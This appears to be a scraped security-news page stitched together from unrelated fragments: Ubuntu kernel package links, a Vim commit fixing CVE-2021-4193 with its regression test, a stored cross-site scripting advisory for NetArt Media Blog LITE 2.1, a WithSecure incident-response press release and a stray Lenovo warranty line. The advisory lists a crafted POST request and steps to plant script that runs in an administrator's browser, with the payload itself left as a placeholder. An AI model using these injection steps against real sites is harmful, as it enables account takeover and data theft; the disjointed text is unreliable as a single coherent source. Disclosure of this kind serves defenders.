https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1035.41~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-92.102~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1045.48~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-92.102~20.04.1

Ubuntu Security Notice USN-6609-1

Permalink

Browse files

patch 8.2.3950: going beyond the end of the line with /\\%V

Problem:    Going beyond the end of the line with /\\%V.
Solution:   Check for valid column in getvcol().

*   Loading branch information

![@brammool](https://avatars.githubusercontent.com/u/8530623?s=40&v=4)

1 parent 4c13e5e commit 94f3192b03ed27474db80b4d3a409e107140738b

Showing with **19 additions** and **4 deletions**.

1.  +9 −4 src/charset.c
2.  +8 −0 src/testdir/test\_regexp\_latin.vim
3.  +2 −0 src/version.c

@@ -1240,10 +1240,15 @@ getvcol(

posptr = NULL; // continue until the NUL

else

{

// Special check for an empty line, which can happen on exit, when

// ml\_get\_buf() always returns an empty string.

if (\*ptr == NUL)

pos->col = 0;

colnr\_T i;

  

// In a few cases the position can be beyond the end of the line.

for (i = 0; i < pos->col; ++i)

if (ptr\[i\] == NUL)

{

pos->col = i;

break;

}

posptr = ptr + pos->col;

if (has\_mbyte)

// always start on the first byte

@@ -1053,4 +1053,12 @@ func Test\_using\_visual\_position()

bwipe!

endfunc

  

func Test\_using\_invalid\_visual\_position()

" this was going beyond the end of the line

new

exe "norm 0o000\\<Esc>0\\<C-V>$s0"

/\\%V

bwipe!

endfunc

  

" vim: shiftwidth\=2 sts\=2 expandtab

@@ -749,6 +749,8 @@ static char \*(features\[\]) =

  

static int included\_patches\[\] =

{ /\* Add new patch number below this line \*/

/\*\*/

3950,

/\*\*/

3949,

/\*\*/

**0 comments on commit `94f3192`**

Please sign in to comment.

CVE-2021-4193: patch 8.2.3950: going beyond the end of the line with /\%V · vim/vim@94f3192

NetArt Media Blog LITE version 2.1 suffers from a persistent cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/blog-lite                                      ││  Vendor   : NetArt Media                                                               ││  Software : Blog LITE 2.1                                                              ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS---------------------------------------------------------POST /blog/index.php HTTP/2-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="title"[XSS Payload]-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="content"-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="author"[XSS Payload]-----------------------------401019026540470155022776857270Content-Disposition: form-data; name="email"-----------------------------401019026540470155022776857270## Steps to Reproduce:1. Visit Any Category on the Blog2. Write a comment (as Guest)3. Inject your [XSS Payload] in "Comment Title"4. Inject your [XSS Payload] in "Your Name"5. Submit6. By default the Blog Disable your comment for Admin Check7. Admin Check the [BLOG POSTS] in the Administration Panel on this Path (https://website/blog/admin/index.php?page=posts)8. When the Admin check the comments on this Path (https://website/blog/admin/index.php?page=comments&id=2)9. XSS Will Fire and Executed on his Browser[-] Done

NetArt Media Blog LITE 2.1 Cross Site Scripting

New retainer provides expert support starting in the first 72 hours of the incident response process to contain the attack and improve preparedness for the future.

**Helsinki, Finland – May 17, 2023:** The first 72 hours of an attack are a crucial window for incident response teams. To support organizations in preparing a swift, efficient response to incidents while minimizing their impact on operations, WithSecure™ (formerly known as F-Secure Business) is offering a new range of incident readiness and response packages.  

Incident response is more challenging than ever. Cloud services complicate IT security, skills are scarce, and responsibilities are shared with cloud service providers.   

Based on his experience, Cyber Security Advisor Paul Brucciani says that in spite of cyber attacks’ ubiquity, many mid-market organizations find themselves unprepared for incidents when they occur.

“Today, only about one in five organizations have an incident response plan–typically enterprises with well-developed cyber security. Mid-market companies don’t have these resources and if there is any service fit to be outsourced, it is incident response. Our new offering brings industry-leading incident response services to the mid-market to make it more resilient to cyber-attacks, covering both traditional on-premise and cloud IT,” he said.  

WithSecure™ has a strong record of providing incident response services to organizations large and small throughout the globe. It has over 30 years of experience in helping organizations prepare for, respond to, and recover from data breaches. Its incident response capability is assured by government agencies in Germany and the UK.

The new range of incident response offerings include three different but related services:  

*   Incident Readiness
*   Incident Response Retainer
*   Emergency Incident Response Support  
    

"The first 72 hours of an attack are vital for limiting the damage. Not just to mitigate direct damages, but it’s also important for GDPR compliance, as organizations are required to report certain incidents within that time frame. Without an effective response during that window, organizations will struggle to understand the scope of the damages and what steps to take next,” added Brucciani.    

More information on WithSecure's range of incident response services is available at

**About WithSecure™**

WithSecure™, formerly F-Secure Business, is cyber security's reliable partner. IT service providers, MSSPs and businesses – along with the largest financial institutions, manufacturers, and thousands of the world's most advanced communications and technology providers – trust us for outcome-based cyber security that protects and enables their operations. Our AI-driven protection secures endpoints and cloud collaboration, and our intelligent detection and response are powered by experts who identify business risks by proactively hunting for threats and confronting live attacks. Our consultants partner with enterprises and tech challengers to build resilience through evidence-based security advice. With more than 30 years of experience in building technology that meets business objectives, we've built our portfolio to grow with our partners through flexible commercial models.  

WithSecure™ Corporation was founded in 1988, and is listed on NASDAQ OMX Helsinki Ltd.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us